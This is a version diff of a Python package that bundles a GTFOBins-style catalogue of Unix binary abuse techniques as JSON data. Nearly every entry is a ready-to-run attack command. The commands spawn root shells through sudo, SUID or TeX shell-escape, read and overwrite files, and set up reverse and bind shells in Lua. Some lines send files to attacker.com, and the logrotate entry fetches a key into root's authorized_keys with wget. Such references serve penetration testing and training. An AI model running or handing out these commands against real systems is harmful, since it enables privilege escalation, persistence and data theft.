gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/kubectl.json

@@ -0,0 +1,30 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.",
+        "code": "LFILE=dir_to_serve\nkubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.",
+        "code": "LFILE=dir_to_serve\n./kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/\n"
+      },
+      {
+        "description": "It pops a new privileged shell using custom configuration",
+        "code": "cat << EOF > /tmp/config\napiVersion: v1\nclusters:\n- cluster:\n    server: https://test\n  name: kubernetes\ncontexts:\n- context:\n    cluster: kubernetes\n    user: kubernetes-admin\n  name: kubernetes-admin@kubernetes\ncurrent-context: kubernetes-admin@kubernetes\nkind: Config\npreferences: {}\nusers:\n- name: kubernetes-admin\n  user:\n    exec:\n      apiVersion: client.authentication.k8s.io/v1\n      command: /bin/bash\n      args: \n        - \"-p\"\n        - \"-c\"\n        - \"/bin/bash -p </dev/tty >/dev/tty 2>/dev/tty\"\n      interactiveMode: Always\nEOF\n./kubectl get pods --kubeconfig=/tmp/config \n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.",
+        "code": "LFILE=dir_to_serve\nsudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/\n"
+      },
+      {
+        "description": "It pops a new privileged shell using custom configuration",
+        "code": "cat << EOF > /tmp/config\napiVersion: v1\nclusters:\n- cluster:\n    server: https://test\n  name: kubernetes\ncontexts:\n- context:\n    cluster: kubernetes\n    user: kubernetes-admin\n  name: kubernetes-admin@kubernetes\ncurrent-context: kubernetes-admin@kubernetes\nkind: Config\npreferences: {}\nusers:\n- name: kubernetes-admin\n  user:\n    exec:\n      apiVersion: client.authentication.k8s.io/v1\n      command: /bin/bash\n      args: \n        - \"-p\"\n        - \"-c\"\n        - \"/bin/bash -p </dev/tty >/dev/tty 2>/dev/tty\"\n      interactiveMode: Always\nEOF\nsudo kubectl get pods --kubeconfig=/tmp/config \n"
+      }
+    ]
+  }
+}

gtfo/data/last.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system. The output might be corrupted or incomplete if the file does not follow the expected database format. Available in util-linux on CentOS, RHEL, Fedora.",
+        "code": "LFILE=file_to_read\nlast -f $LFILE -a\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.",
+        "code": "LFILE=file_to_read\nlast -f $LFILE -a\n"
+      }
+    ]
+  }
+}

gtfo/data/lastb.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system. The output might be corrupted or incomplete if the file does not follow the expected database format. Available in util-linux on CentOS, RHEL, Fedora.",
+        "code": "LFILE=file_to_read\nlast -f $LFILE -a\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.",
+        "code": "LFILE=file_to_read\nlast -f $LFILE -a\n"
+      }
+    ]
+  }
+}

gtfo/data/latex.json

@@ -2,26 +2,35 @@
   "functions": {
     "shell": [
       {
+        
         "code": "latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ],
     "file-read": [
       {
         "description": "The read file will be part of the output.",
-        "code": "latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+        "code": "latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\nstrings article.dvi\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "",
+        "code": "latex '\\documentclass{article}\\begin{document}\\immediate\\openout\\tempfile=file_to_write\\immediate\\write\\tempfile{content_to_write}\\end{document}'\n"
       }
     ],
     "sudo": [
       {
         "description": "The read file will be part of the output.",
-        "code": "sudo latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+        "code": "sudo latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\nstrings article.dvi\n"
       },
       {
+        
         "code": "sudo latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
       }
     ]

gtfo/data/latexmk.json

@@ -1,26 +1,29 @@
 {
-  "description": "This allows to execute Perl code.",
   "functions": {
     "shell": [
       {
-        "code": "latexmk -e 'exec \"/bin/sh\";'"
+        
+        "code": "latexmk -e 'exec \"/bin/sh\";'\n"
       },
       {
-        "code": "latexmk -latex='/bin/sh"
+        
+        "code": "latexmk -latex='/bin/sh #' /dev/null\n"
       }
     ],
     "file-read": [
       {
-        "code": "latexmk -e 'open(X,\"[file]\");while(<X>){print $_;}exit'"
+        
+        "code": "latexmk -e 'open(X,\"/etc/passwd\");while(<X>){print $_;}exit'\n"
       },
       {
         "description": "The read file will be part of the output.",
-        "code": "TF=$(mktemp)\necho '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}' >$TF\nstrings tmp.dvi\n"
+        "code": "TF=$(mktemp)\necho '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}' >$TF\nstrings tmp.dvi\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo latexmk -e 'exec \"/bin/sh\";'"
+        
+        "code": "sudo latexmk -e 'exec \"/bin/sh\";'\n"
       }
     ]
   }

gtfo/data/ld.so.json

@@ -1,20 +1,22 @@
 {
-  "description": "'ld.so' is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:\n```\n$ strings /proc/self/exe | head -1\n/lib64/ld-linux-x86-64.so.2\n```",
   "functions": {
     "shell": [
       {
-        "code": "/lib/ld.so /bin/sh"
+        
+        "code": "/lib/ld.so /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./ld.so /bin/sh -p"
+        
+        "code": "./ld.so /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo /lib/ld.so /bin/sh"
+        
+        "code": "sudo /lib/ld.so /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/ldconfig.json

@@ -1,5 +1,4 @@
 {
-  "description": "Follows a minimal example of how to use the described technique (details may change across different distributions). Run the code associated with the technique. Identify a target SUID executable, for example the 'libcap' library of 'ping':\n\n```\n$ ldd /bin/ping | grep libcap\n      libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)\n```\n\nCreate a fake library that spawns a shell at bootstrap:\n\n```\necho '#include <unistd.h>\n\n__attribute__((constructor))\nstatic void init() {\n    execl(\"/bin/sh\", \"/bin/sh\", \"-p\", NULL);\n}\n' >\"$TF/lib.c\"\n```\n\nCompile it with:\n\n```\ngcc -fPIC -shared \"$TF/lib.c\" -o \"$TF/libcap.so.2\"\n```\n\nRun 'ldconfig' again as described below then just run 'ping' to obtain a root shell:\n\n```\n$ ping\n# id\nuid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)\n```",
   "functions": {
     "sudo": [
       {
@@ -14,4 +13,4 @@
       }
     ]
   }
-}
+}

gtfo/data/less.json

@@ -2,39 +2,49 @@
   "functions": {
     "shell": [
       {
+        
         "code": "less /etc/profile\n!/bin/sh\n"
       },
       {
+        
         "code": "VISUAL=\"/bin/sh -c '/bin/sh'\" less /etc/profile\nv\n"
+      },
+      {
+        
+        "code": "less /etc/profile\nv:shell\n"
       }
     ],
     "file-read": [
       {
-        "code": "less [file]"
+        
+        "code": "less file_to_read\n"
       },
       {
-        "description": "This is useful when 'less' is used as a pager by another binary to read a different file.",
-        "code": "less /etc/profile\n:e [file]\n"
+        "description": "This is useful when `less` is used as a pager by another binary to read a different file.",
+        "code": "less /etc/profile\n:e file_to_read\n"
       }
     ],
     "file-write": [
       {
-        "code": "echo DATA | less\n[file]\nq\n"
+        
+        "code": "echo DATA | less\nsfile_to_write\nq\n"
       },
       {
         "description": "This invokes the default editor to edit the file. The file must exist.",
-        "code": "less [file]\nv\n"
+        "code": "less file_to_write\nv\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo less /etc/profile\n!/bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./less [file]"
+        
+        "code": "./less file_to_read\n"
       }
     ]
   }
-}
+}

gtfo/data/lessfilter.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "This can read arbitrary files by creating a custom lessfilter script.\n",
+        "code": "echo '#!/bin/bash\ncat \"$1\"\nexit 0' > ~/.lessfilter\nchmod +x ~/.lessfilter\nexport LESSOPEN=\"|~/.lessfilter %s\"\nless /etc/passwd\n"
+      }
+    ],
+    "shell": [
+      {
+        "description": "This can spawn an interactive shell by executing commands through lessfilter.\n",
+        "code": "echo '#!/bin/bash\n/bin/bash\nexit 0' > ~/.lessfilter\nchmod +x ~/.lessfilter\nexport LESSOPEN=\"|~/.lessfilter %s\"\nless anyfile\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "This executes arbitrary commands through the lessfilter mechanism.\n",
+        "code": "echo '#!/bin/bash\nCOMMAND\nexit 0' > ~/.lessfilter\nchmod +x ~/.lessfilter\nexport LESSOPEN=\"|~/.lessfilter %s\"\nless anyfile\n"
+      }
+    ]
+  }
+}

gtfo/data/lesspipe.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "This can read files by modifying the system lesspipe script if writable.\n",
+        "code": "echo 'cat /etc/passwd' >> /usr/bin/lesspipe.sh\nless anyfile\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "This executes commands if the lesspipe script is writable.\n",
+        "code": "echo 'COMMAND' >> /usr/bin/lesspipe.sh\nless anyfile\n"
+      }
+    ]
+  }
+}

gtfo/data/lftp.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "lftp -c '!/bin/sh'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./lftp -c '!/bin/sh'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo lftp -c '!/bin/sh'\n"
+      }
+    ]
+  }
+}

gtfo/data/links.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nlinks \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./links \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo links \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ln.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "sudo ln -fs /bin/sh /bin/ln\nsudo ln\n"
+      }
+    ]
+  }
+}

gtfo/data/loginctl.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "loginctl user-status\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo loginctl user-status\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/logrotate.json

@@ -0,0 +1,38 @@
+{
+  "functions": {
+    "command": [
+      {
+        "description": "Requires a logrotate policy which uses the `mail` directive. A hash should be used as the final character in the command, as it is run with a few arguments.",
+        "code": "COMMAND='id &> /tmp/output #'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nlogrotate -m \"$TF\" -v -f logrotate.policy\n"
+      }
+    ],
+    "shell": [
+      {
+        "description": "Requires a logrotate policy which uses the `mail` directive.",
+        "code": "COMMAND='/usr/bin/bash -i #'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nlogrotate -m \"$TF\" -v -f logrotate.policy\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Creates or overwrites the file with the exact text `logrotate state -- version 2`",
+        "code": "LFILE=file_to_write\nlogrotate -s \"$LFILE\" logrotate.policy\n"
+      },
+      {
+        "description": "Creates or overwrites the file with junk data in combination with arbitrary data.",
+        "code": "LFILE=file_to_write\nDATA=data_to_write\nlogrotate -l \"$LFILE\" \"$DATA\"\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "Reads the first 'word'.",
+        "code": "LFILE=file_to_read\nlogrotate \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Note that this will overwrite `/etc/cron.daily/man-db` with a cronjob.",
+        "code": "sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget https://example.com/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'\n"
+      }
+    ]
+  }
+}

gtfo/data/logsave.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "logsave /dev/null /bin/sh -i"
+        
+        "code": "logsave /dev/null /bin/sh -i\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo logsave /dev/null /bin/sh -i"
+        
+        "code": "sudo logsave /dev/null /bin/sh -i\n"
       }
     ],
     "suid": [
       {
-        "code": "./logsave /dev/null /bin/sh -i -p"
+        
+        "code": "./logsave /dev/null /bin/sh -i -p\n"
       }
     ]
   }
-}
+}

gtfo/data/look.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "look '' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nlook '' \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./look '' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./look '' \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo look '' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo look '' \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/lp.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "To collect the file run the following on the attacker box (this requires `cups` to be installed):\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet;\n4. `nc -lkp 9100` to receive the file.\n\nSend a local file to a CUPS server.\n",
+        "code": "LFILE=file_to_send\nRHOST=attacker.com\nlp $LFILE -h $RHOST\n"
+      }
+    ]
+  }
+}

gtfo/data/ltrace.json

@@ -3,23 +3,25 @@
     "file-read": [
       {
         "description": "The file is parsed as a configuration file and its content is shown as error messages, thus this is not suitable to exfiltrate binary files.",
-        "code": "ltrace -F [file] /dev/null\n"
+        "code": "LFILE=file_to_read\nltrace -F $LFILE /dev/null\n"
       }
     ],
     "file-write": [
       {
-        "description": "The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of 'ltrace -F [data]'.",
-        "code": "ltrace -s 999 -o [file] ltrace -F [data]\n"
+        "description": "The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.",
+        "code": "LFILE=file_to_write\nltrace -s 999 -o $LFILE ltrace -F DATA\n"
       }
     ],
     "shell": [
       {
-        "code": "ltrace -b -L /bin/sh"
+        
+        "code": "ltrace -b -L /bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ltrace -b -L /bin/sh"
+        
+        "code": "sudo ltrace -b -L /bin/sh\n"
       }
     ]
   }

gtfo/data/lua.json

@@ -2,56 +2,62 @@
   "functions": {
     "shell": [
       {
-        "code": "lua -e 'os.execute(\"/bin/sh\")'"
+        
+        "code": "lua -e 'os.execute(\"/bin/sh\")'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires 'lua-socket' installed.",
-        "code": "lua -e 'local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+        "description": "Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nlua -e 'local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires 'lua-socket' installed.",
-        "code": "lua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.",
+        "code": "export LPORT=12345\nlua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires 'lua-socket' installed.",
-        "code": "lua -e '\n  local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+        "description": "Send a local file via TCP. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file. This requires `lua-socket` installed.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\nlua -e '\n  local f=io.open(os.getenv(\"LFILE\"), 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(os.getenv(\"RHOST\"),os.getenv(\"RPORT\"));\n  t:send(d);\n  t:close();'\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires 'lua-socket' to be installed.",
-        "code": "lua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+        "description": "Fetch a remote file via TCP. Run `nc target.com 12345 < \"file_to_send\"` on the attacker box to send the file. This requires `lua-socket` installed.",
+        "code": "export LPORT=12345\nexport LFILE=file_to_save\nlua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",os.getenv(\"LPORT\")));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(os.getenv(\"LFILE\"), \"wb\");\n  f:write(d);\n  io.close(f);'\n"
       }
     ],
     "file-write": [
       {
-        "code": "lua -e 'local f=io.open(\"[file]\", \"wb\"); f:write(\"DATA\"); io.close(f);'"
+        
+        "code": "lua -e 'local f=io.open(\"file_to_write\", \"wb\"); f:write(\"DATA\"); io.close(f);'\n"
       }
     ],
     "file-read": [
       {
-        "code": "lua -e 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);'"
+        
+        "code": "lua -e 'local f=io.open(\"file_to_read\", \"rb\"); print(f:read(\"*a\")); io.close(f);'\n"
       }
     ],
-      "suid": [
+    "suid": [
       {
-        "code": "lua -e 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);'"
+        
+        "code": "lua -e 'local f=io.open(\"file_to_read\", \"rb\"); print(f:read(\"*a\")); io.close(f);'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo lua -e 'os.execute(\"/bin/sh\")'"
+        
+        "code": "sudo lua -e 'os.execute(\"/bin/sh\")'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./lua -e 'os.execute(\"/bin/sh\")'"
+        
+        "code": "./lua -e 'os.execute(\"/bin/sh\")'\n"
       }
     ]
   }

gtfo/data/lualatex.json

@@ -1,19 +1,21 @@
 {
-  "description": "This allows to execute Lua code.",
   "functions": {
     "shell": [
       {
-        "code": "lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+        
+        "code": "lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+        
+        "code": "sudo lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+        
+        "code": "./lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'\n"
       }
     ]
   }

gtfo/data/luatex.json

@@ -1,19 +1,21 @@
 {
-  "description": "This allows to execute Lua code.",
   "functions": {
     "shell": [
       {
-        "code": "luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+        
+        "code": "luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+        
+        "code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+        
+        "code": "./luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'\n"
       }
     ]
   }